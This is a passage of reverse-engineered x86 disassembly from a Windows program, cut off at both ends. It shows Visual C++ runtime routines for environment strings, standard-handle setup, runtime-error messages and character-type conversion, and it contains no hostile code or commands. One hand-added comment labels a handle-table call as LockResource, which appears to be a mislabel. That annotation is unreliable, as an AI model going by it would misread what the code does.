inc dword ptr [ecx]
loc_41F44F: ; CODE XREF: sub_41F2D9+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41F465
; ---------------------------------------------------------------------------
loc_41F456: ; CODE XREF: sub_41F2D9+162�j
movzx edx, dl
test ds:byte_4CEF01[edx], 4
jz short loc_41F465
inc eax
inc dword ptr [ecx]
loc_41F465: ; CODE XREF: sub_41F2D9+17B�j
; sub_41F2D9+187�j
inc dword ptr [ecx]
loc_41F467: ; CODE XREF: sub_41F2D9+15E�j
inc eax
jmp loc_41F3C5
; ---------------------------------------------------------------------------
loc_41F46D: ; CODE XREF: sub_41F2D9+148�j
; sub_41F2D9+153�j ...
test esi, esi
jz short loc_41F475
and byte ptr [esi], 0
inc esi
loc_41F475: ; CODE XREF: sub_41F2D9+196�j
inc dword ptr [ecx]
jmp loc_41F393
; ---------------------------------------------------------------------------
loc_41F47C: ; CODE XREF: sub_41F2D9+BD�j
; sub_41F2D9+D5�j
test edi, edi
jz short loc_41F483
and dword ptr [edi], 0
loc_41F483: ; CODE XREF: sub_41F2D9+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_41F2D9 endp
; =============== S U B R O U T I N E =======================================
sub_41F48D proc near ; CODE XREF: _0:00419C63�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_4CDB70
push ebx
push ebp
mov ebp, ds:dword_42403C
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_41F4DB
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41F4BC
mov ds:dword_4CDB70, 1
jmp short loc_41F4E4
; ---------------------------------------------------------------------------
loc_41F4BC: ; CODE XREF: sub_41F48D+21�j
call ds:dword_424040 ;; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_41F5B6
mov ds:dword_4CDB70, 2
jmp loc_41F56A
; ---------------------------------------------------------------------------
loc_41F4DB: ; CODE XREF: sub_41F48D+19�j
cmp eax, 1
jnz loc_41F565
loc_41F4E4: ; CODE XREF: sub_41F48D+2D�j
cmp esi, ebx
jnz short loc_41F4F4
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_41F5B6
loc_41F4F4: ; CODE XREF: sub_41F48D+59�j
cmp [esi], bx
mov eax, esi
jz short loc_41F509
loc_41F4FB: ; CODE XREF: sub_41F48D+73�j
; sub_41F48D+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_41F4FB
inc eax
inc eax
cmp [eax], bx
jnz short loc_41F4FB
loc_41F509: ; CODE XREF: sub_41F48D+6C�j
sub eax, esi
mov edi, ds:dword_424150
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41F55A
push ebp
call sub_417B89
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_41F55A
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_41F556
push [esp+18h+var_8]
call sub_417C3B
pop ecx
mov [esp+18h+var_8], ebx
loc_41F556: ; CODE XREF: sub_41F48D+B9�j
mov ebx, [esp+18h+var_8]
loc_41F55A: ; CODE XREF: sub_41F48D+99�j
; sub_41F48D+A8�j
push esi
call ds:dword_424044 ;; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_41F5B8
; ---------------------------------------------------------------------------
loc_41F565: ; CODE XREF: sub_41F48D+51�j
cmp eax, 2
jnz short loc_41F5B6
loc_41F56A: ; CODE XREF: sub_41F48D+49�j
cmp edi, ebx
jnz short loc_41F57A
call ds:dword_424040 ;; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz short loc_41F5B6
loc_41F57A: ; CODE XREF: sub_41F48D+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_41F58A
loc_41F580: ; CODE XREF: sub_41F48D+F6�j
; sub_41F48D+FB�j
inc eax
cmp [eax], bl
jnz short loc_41F580
inc eax
cmp [eax], bl
jnz short loc_41F580
loc_41F58A: ; CODE XREF: sub_41F48D+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_417B89
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_41F5A0
xor esi, esi
jmp short loc_41F5AB
; ---------------------------------------------------------------------------
loc_41F5A0: ; CODE XREF: sub_41F48D+10D�j
push ebp
push edi
push esi
call sub_417390
add esp, 0Ch
loc_41F5AB: ; CODE XREF: sub_41F48D+111�j
push edi
call ds:dword_424048 ;; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_41F5B8
; ---------------------------------------------------------------------------
loc_41F5B6: ; CODE XREF: sub_41F48D+39�j
; sub_41F48D+61�j ...
xor eax, eax
loc_41F5B8: ; CODE XREF: sub_41F48D+D6�j
; sub_41F48D+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_41F48D endp
; =============== S U B R O U T I N E =======================================
sub_41F5BF proc near ; CODE XREF: _0:00419C53�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_417B89
mov esi, eax
pop ecx
test esi, esi
jnz short loc_41F5DF
push 1Bh
call sub_419CDA
pop ecx
loc_41F5DF: ; CODE XREF: sub_41F5BF+16�j
mov ds:dword_4CECE0, esi
mov ds:dword_4CEDE0, 20h
lea eax, [esi+100h]
loc_41F5F5: ; CODE XREF: sub_41F5BF+52�j
cmp esi, eax
jnb short loc_41F613
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, ds:dword_4CECE0
add esi, 8
add eax, 100h
jmp short loc_41F5F5
; ---------------------------------------------------------------------------
loc_41F613: ; CODE XREF: sub_41F5BF+38�j
lea eax, [esp+54h+var_44]
push eax
call ds:dword_424198 ;; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_41F6EF
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_41F6EF
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_41F649
mov esi, eax
loc_41F649: ; CODE XREF: sub_41F5BF+86�j
cmp ds:dword_4CEDE0, esi
jge short loc_41F6A3
mov edi, offset dword_4CECE4
loc_41F656: ; CODE XREF: sub_41F5BF+DA�j
push 100h
call sub_417B89
test eax, eax
pop ecx
jz short loc_41F69D
add ds:dword_4CEDE0, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_41F674: ; CODE XREF: sub_41F5BF+CF�j
cmp eax, ecx
jnb short loc_41F690
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_41F674
; ---------------------------------------------------------------------------
loc_41F690: ; CODE XREF: sub_41F5BF+B7�j
add edi, 4
cmp ds:dword_4CEDE0, esi
jl short loc_41F656
jmp short loc_41F6A3
; ---------------------------------------------------------------------------
loc_41F69D: ; CODE XREF: sub_41F5BF+A4�j
mov esi, ds:dword_4CEDE0
loc_41F6A3: ; CODE XREF: sub_41F5BF+90�j
; sub_41F5BF+DC�j
xor edi, edi
test esi, esi
jle short loc_41F6EF
loc_41F6A9: ; CODE XREF: sub_41F5BF+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_41F6E6
mov cl, [ebp+0]
test cl, 1
jz short loc_41F6E6
test cl, 8
jnz short loc_41F6C8
push eax
call ds:dword_424030 ;; GetFileType
test eax, eax
jz short loc_41F6E6
loc_41F6C8: ; CODE XREF: sub_41F5BF+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_4CECE0[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_41F6E6: ; CODE XREF: sub_41F5BF+EF�j
; sub_41F5BF+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_41F6A9
loc_41F6EF: ; CODE XREF: sub_41F5BF+65�j
; sub_41F5BF+71�j ...
xor ebx, ebx
loc_41F6F1: ; CODE XREF: sub_41F5BF+195�j
mov eax, ds:dword_4CECE0
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_41F74C
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41F70C
push 0FFFFFFF6h
pop eax
jmp short loc_41F716
; ---------------------------------------------------------------------------
loc_41F70C: ; CODE XREF: sub_41F5BF+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41F716: ; CODE XREF: sub_41F5BF+14B�j
push eax
call ds:dword_424034 ;; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41F73B
push edi
call ds:dword_424030 ;; GetFileType
test eax, eax
jz short loc_41F73B
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_41F741
loc_41F73B: ; CODE XREF: sub_41F5BF+163�j
; sub_41F5BF+16E�j
or byte ptr [esi+4], 40h
jmp short loc_41F750
; ---------------------------------------------------------------------------
loc_41F741: ; CODE XREF: sub_41F5BF+17A�j
cmp eax, 3
jnz short loc_41F750
or byte ptr [esi+4], 8
jmp short loc_41F750
; ---------------------------------------------------------------------------
loc_41F74C: ; CODE XREF: sub_41F5BF+13E�j
or byte ptr [esi+4], 80h
loc_41F750: ; CODE XREF: sub_41F5BF+180�j
; sub_41F5BF+185�j ...
inc ebx
cmp ebx, 3
jl short loc_41F6F1
push ds:dword_4CEDE0
call ds:dword_424038 ;; LockResource
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_41F5BF endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F774 proc near ; DATA XREF: _0:00419BEE�o
; sub_41CFF1+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41F814
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41F7A7: ; CODE XREF: sub_41F774+90�j
cmp esi, 0FFFFFFFFh
jz short loc_41F80D
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41F7FB
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41F7FB
js short loc_41F806
mov edi, [ebx+8]
push ebx
call sub_4181A0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4181E2
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_418276
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_41F7FB: ; CODE XREF: sub_41F774+40�j
; sub_41F774+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41F7A7
; ---------------------------------------------------------------------------
loc_41F806: ; CODE XREF: sub_41F774+54�j
mov eax, 0
jmp short loc_41F829
; ---------------------------------------------------------------------------
loc_41F80D: ; CODE XREF: sub_41F774+36�j
mov eax, 1
jmp short loc_41F829
; ---------------------------------------------------------------------------
loc_41F814: ; CODE XREF: sub_41F774+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4181E2
add esp, 8
pop ebp
mov eax, 1
loc_41F829: ; CODE XREF: sub_41F774+97�j
; sub_41F774+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41F774 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4181E2
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41F84C proc near ; CODE XREF: sub_419CDA+9�p
; sub_419CFF+9�p
mov eax, ds:dword_4CDA08
cmp eax, 1
jz short loc_41F863
test eax, eax
jnz short locret_41F884
cmp ds:dword_433C64, 1
jnz short locret_41F884
loc_41F863: ; CODE XREF: sub_41F84C+8�j
push 0FCh
call sub_41F885
mov eax, ds:dword_4CDB74
pop ecx
test eax, eax
jz short loc_41F879
call eax
loc_41F879: ; CODE XREF: sub_41F84C+29�j
push 0FFh
call sub_41F885
pop ecx
locret_41F884: ; CODE XREF: sub_41F84C+C�j
; sub_41F84C+15�j
retn
sub_41F84C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F885 proc near ; CODE XREF: sub_419CDA+12�p
; sub_419CFF+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_4362F8
loc_41F898: ; CODE XREF: sub_41F885+20�j
cmp edx, [eax]
jz short loc_41F8A7
add eax, 8
inc ecx
cmp eax, offset off_436388
jl short loc_41F898
loc_41F8A7: ; CODE XREF: sub_41F885+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, ds:dword_4362F8[esi]
jnz loc_41F9D5
mov eax, ds:dword_4CDA08
cmp eax, 1
jz loc_41F9AF
test eax, eax
jnz short loc_41F8D8
cmp ds:dword_433C64, 1
jz loc_41F9AF
loc_41F8D8: ; CODE XREF: sub_41F885+44�j
cmp edx, 0FCh
jz loc_41F9D5
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call ds:off_424094
test eax, eax
jnz short loc_41F90F
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_4179C0
pop ecx
pop ecx
loc_41F90F: ; CODE XREF: sub_41F885+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_417AB0
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_41F952
lea eax, [ebp+var_1A4]
push eax
call sub_417AB0
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_418C10
add esp, 10h
loc_41F952: ; CODE XREF: sub_41F885+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_4179C0
lea eax, [ebp+var_A0]
push edi
push eax
call sub_4179D0
lea eax, [ebp+var_A0]
push offset asc_424BA8 ; "\n\n"
push eax
call sub_4179D0
push ds:off_4362FC[esi]
lea eax, [ebp+var_A0]
push eax
call sub_4179D0
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_42105F
add esp, 2Ch
pop edi
jmp short loc_41F9D5
; ---------------------------------------------------------------------------
loc_41F9AF: ; CODE XREF: sub_41F885+3C�j
; sub_41F885+4D�j
lea eax, [ebp+arg_0]
lea esi, off_4362FC[esi]
push 0
push eax
push dword ptr [esi]
call sub_417AB0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_424034 ;; GetStdHandle
push eax
call ds:dword_42407C ;; WriteFile
loc_41F9D5: ; CODE XREF: sub_41F885+2E�j
; sub_41F885+59�j ...
pop esi
leave
retn
sub_41F885 endp
; =============== S U B R O U T I N E =======================================
sub_41F9D8 proc near ; CODE XREF: sub_419D23+6C�p
; sub_41E248+32�p ...
arg_0 = dword ptr 4
inc ds:dword_4CDB78
push 1000h
call sub_417B89
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_41FA01
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_41FA12
; ---------------------------------------------------------------------------
loc_41FA01: ; CODE XREF: sub_41F9D8+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_41FA12: ; CODE XREF: sub_41F9D8+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41F9D8 endp
; =============== S U B R O U T I N E =======================================
sub_41FA1C proc near ; CODE XREF: sub_419D23+61�p
; sub_41A8A2+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_4CEDE0
jb short loc_41FA2B
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41FA2B: ; CODE XREF: sub_41FA1C+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_4CECE0[ecx*4]
mov al, [ecx+eax*8+4]
and eax, 40h
retn
sub_41FA1C endp
; =============== S U B R O U T I N E =======================================
sub_41FA42 proc near ; DATA XREF: _2:00426020�o
mov eax, ds:dword_4CECC0
push esi
push 14h
test eax, eax
pop esi
jnz short loc_41FA56
mov eax, 200h
jmp short loc_41FA5C
; ---------------------------------------------------------------------------
loc_41FA56: ; CODE XREF: sub_41FA42+B�j
cmp eax, esi
jge short loc_41FA61
mov eax, esi
loc_41FA5C: ; CODE XREF: sub_41FA42+12�j
mov ds:dword_4CECC0, eax
loc_41FA61: ; CODE XREF: sub_41FA42+16�j
push 4
push eax
call sub_4210E8
pop ecx
mov ds:dword_4CDCB0, eax
test eax, eax
pop ecx
jnz short loc_41FA95
push 4
push esi
mov ds:dword_4CECC0, esi
call sub_4210E8
pop ecx
mov ds:dword_4CDCB0, eax
test eax, eax
pop ecx
jnz short loc_41FA95
push 1Ah
call sub_419CDA
pop ecx
loc_41FA95: ; CODE XREF: sub_41FA42+30�j
; sub_41FA42+49�j
xor ecx, ecx
mov eax, offset off_436388
loc_41FA9C: ; CODE XREF: sub_41FA42+6E�j
mov edx, ds:dword_4CDCB0
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset dword_436608
jl short loc_41FA9C
xor edx, edx
mov ecx, offset dword_436398
loc_41FAB9: ; CODE XREF: sub_41FA42+A1�j
mov eax, edx
mov esi, edx
sar eax, 5
and esi, 1Fh
mov eax, ds:dword_4CECE0[eax*4]
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_41FAD6
test eax, eax
jnz short loc_41FAD9
loc_41FAD6: ; CODE XREF: sub_41FA42+8E�j
or dword ptr [ecx], 0FFFFFFFFh
loc_41FAD9: ; CODE XREF: sub_41FA42+92�j
add ecx, 20h
inc edx
cmp ecx, offset dword_4363F8
jl short loc_41FAB9
pop esi
retn
sub_41FA42 endp
; =============== S U B R O U T I N E =======================================
sub_41FAE7 proc near ; DATA XREF: _2:00426030�o
; FUNCTION CHUNK AT 00421199 SIZE 00000058 BYTES
call sub_41A82C
cmp ds:byte_4CD9F4, 0
jz short locret_41FAFA
jmp loc_421199
; ---------------------------------------------------------------------------
locret_41FAFA: ; CODE XREF: sub_41FAE7+C�j
retn
sub_41FAE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FAFB proc near ; CODE XREF: sub_419E38+2D4�p
; sub_419E38+6B3�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_41FB07
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41FB07: ; CODE XREF: sub_41FAFB+8�j
cmp ds:dword_4CDA48, 0
jnz short loc_41FB22
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_41FB54
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41FB22: ; CODE XREF: sub_41FAFB+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push ds:dword_433E7C
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push ds:dword_4CDA58
call ds:dword_424150 ;; WideCharToMultiByte
test eax, eax
jz short loc_41FB54
cmp [ebp+arg_0], 0
jz short loc_41FB61
loc_41FB54: ; CODE XREF: sub_41FAFB+1E�j
; sub_41FAFB+51�j
mov ds:dword_4CD9B4, 2Ah
or eax, 0FFFFFFFFh
loc_41FB61: ; CODE XREF: sub_41FAFB+57�j
pop ebp
retn
sub_41FAFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FB63 proc near ; CODE XREF: sub_41A642+5E�p
; sub_41EB6C+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_424BE8
push offset sub_41F774
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_4CDB7C
xor ebx, ebx
cmp eax, ebx
jnz short loc_41FBD2
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_4248D8
push esi
call ds:dword_424028 ;; GetStringTypeW
test eax, eax
jz short loc_41FBB0
mov eax, esi
jmp short loc_41FBCD
; ---------------------------------------------------------------------------
loc_41FBB0: ; CODE XREF: sub_41FB63+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_436EF4
push esi
push ebx
call ds:dword_42402C ;; GetStringTypeA
test eax, eax
jz loc_41FC98
push 2
pop eax
loc_41FBCD: ; CODE XREF: sub_41FB63+4B�j
mov ds:dword_4CDB7C, eax
loc_41FBD2: ; CODE XREF: sub_41FB63+2F�j
cmp eax, 2
jnz short loc_41FBFB
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_41FBE3
mov eax, ds:dword_4CDA48
loc_41FBE3: ; CODE XREF: sub_41FB63+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_42402C ;; GetStringTypeA
jmp loc_41FC9A
; ---------------------------------------------------------------------------
loc_41FBFB: ; CODE XREF: sub_41FB63+72�j
cmp eax, 1
jnz loc_41FC98
cmp [ebp+arg_10], ebx
jnz short loc_41FC11
mov eax, ds:dword_4CDA58
mov [ebp+arg_10], eax
loc_41FC11: ; CODE XREF: sub_41FB63+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_424070 ;; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_41FC98
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_417B30
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_417330
add esp, 0Ch
jmp short loc_41FC67
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_41FC67: ; CODE XREF: sub_41FB63+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_41FC98
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_424070 ;; MultiByteToWideChar
cmp eax, ebx
jz short loc_41FC98
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_424028 ;; GetStringTypeW
jmp short loc_41FC9A
; ---------------------------------------------------------------------------
loc_41FC98: ; CODE XREF: sub_41FB63+61�j
; sub_41FB63+9B�j ...
xor eax, eax
loc_41FC9A: ; CODE XREF: sub_41FB63+93�j
; sub_41FB63+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41FB63 endp
; =============== S U B R O U T I N E =======================================
sub_41FCAC proc near ; CODE XREF: sub_41FEC6:loc_42003E�p
push ebx
push esi
push edi
or ebx, 0FFFFFFFFh
xor edi, edi
xor esi, esi
mov ecx, offset dword_4CECE0
loc_41FCBB: ; CODE XREF: sub_41FCAC+48�j
mov eax, [ecx]
test eax, eax
jz short loc_41FCF8
lea edx, [eax+100h]
loc_41FCC7: ; CODE XREF: sub_41FCAC+28�j
cmp eax, edx
jnb short loc_41FCE7
test byte ptr [eax+4], 1
jz short loc_41FCD6
add eax, 8
jmp short loc_41FCC7
; ---------------------------------------------------------------------------
loc_41FCD6: ; CODE XREF: sub_41FCAC+23�j
or dword ptr [eax], 0FFFFFFFFh
sub eax, [ecx]
sar eax, 3
add eax, esi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41FD3B
loc_41FCE7: ; CODE XREF: sub_41FCAC+1D�j
add ecx, 4
inc edi
add esi, 20h
cmp ecx, offset dword_4CEDE0
jl short loc_41FCBB
jmp short loc_41FD3B
; ---------------------------------------------------------------------------
loc_41FCF8: ; CODE XREF: sub_41FCAC+13�j
mov esi, 100h
push esi
call sub_417B89
test eax, eax
pop ecx
jz short loc_41FD3B
add ds:dword_4CEDE0, 20h
lea ecx, ds:4CECE0h[edi*4]
lea edx, [eax+100h]
mov [ecx], eax
loc_41FD1E: ; CODE XREF: sub_41FCAC+88�j
cmp eax, edx
jnb short loc_41FD36
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 8
add edx, esi
jmp short loc_41FD1E
; ---------------------------------------------------------------------------
loc_41FD36: ; CODE XREF: sub_41FCAC+74�j
shl edi, 5
mov ebx, edi
loc_41FD3B: ; CODE XREF: sub_41FCAC+39�j
; sub_41FCAC+4A�j ...
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41FCAC endp
; =============== S U B R O U T I N E =======================================
sub_41FD41 proc near ; CODE XREF: sub_41FEC6+1F4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, ds:dword_4CEDE0
push edi
jnb short loc_41FDA1
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:4CECE0h[ecx*4]
shl esi, 3
mov ecx, [edi]
cmp dword ptr [ecx+esi], 0FFFFFFFFh
jnz short loc_41FDA1
cmp ds:dword_433C64, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_41FD97
sub eax, 0
jz short loc_41FD8E
dec eax
jz short loc_41FD89
dec eax
jnz short loc_41FD97
push ebx
push 0FFFFFFF4h
jmp short loc_41FD91
; ---------------------------------------------------------------------------
loc_41FD89: ; CODE XREF: sub_41FD41+3E�j
push ebx
push 0FFFFFFF5h
jmp short loc_41FD91
; ---------------------------------------------------------------------------
loc_41FD8E: ; CODE XREF: sub_41FD41+3B�j
push ebx
push 0FFFFFFF6h
loc_41FD91: ; CODE XREF: sub_41FD41+46�j
; sub_41FD41+4B�j
call ds:dword_424024 ;; SetStdHandle
loc_41FD97: ; CODE XREF: sub_41FD41+36�j
; sub_41FD41+41�j
mov eax, [edi]
mov [eax+esi], ebx
xor eax, eax
pop ebx
jmp short loc_41FDB5
; ---------------------------------------------------------------------------
loc_41FDA1: ; CODE XREF: sub_41FD41+C�j
; sub_41FD41+28�j
and ds:dword_4CD9B8, 0
mov ds:dword_4CD9B4, 9
or eax, 0FFFFFFFFh
loc_41FDB5: ; CODE XREF: sub_41FD41+5E�j
pop edi
pop esi
retn
sub_41FD41 endp
; =============== S U B R O U T I N E =======================================
sub_41FDB8 proc near ; CODE XREF: sub_41A6B7+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, ds:dword_4CEDE0
push edi
jnb short loc_41FE1B
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea edi, ds:4CECE0h[eax*4]
shl esi, 3
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_41FE1B
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41FE1B
cmp ds:dword_433C64, 1
jnz short loc_41FE11
xor eax, eax
sub ecx, eax
jz short loc_41FE08
dec ecx
jz short loc_41FE03
dec ecx
jnz short loc_41FE11
push eax
push 0FFFFFFF4h
jmp short loc_41FE0B
; ---------------------------------------------------------------------------
loc_41FE03: ; CODE XREF: sub_41FDB8+41�j
push eax
push 0FFFFFFF5h
jmp short loc_41FE0B
; ---------------------------------------------------------------------------
loc_41FE08: ; CODE XREF: sub_41FDB8+3E�j
push eax
push 0FFFFFFF6h
loc_41FE0B: ; CODE XREF: sub_41FDB8+49�j
; sub_41FDB8+4E�j
call ds:dword_424024 ;; SetStdHandle
loc_41FE11: ; CODE XREF: sub_41FDB8+38�j
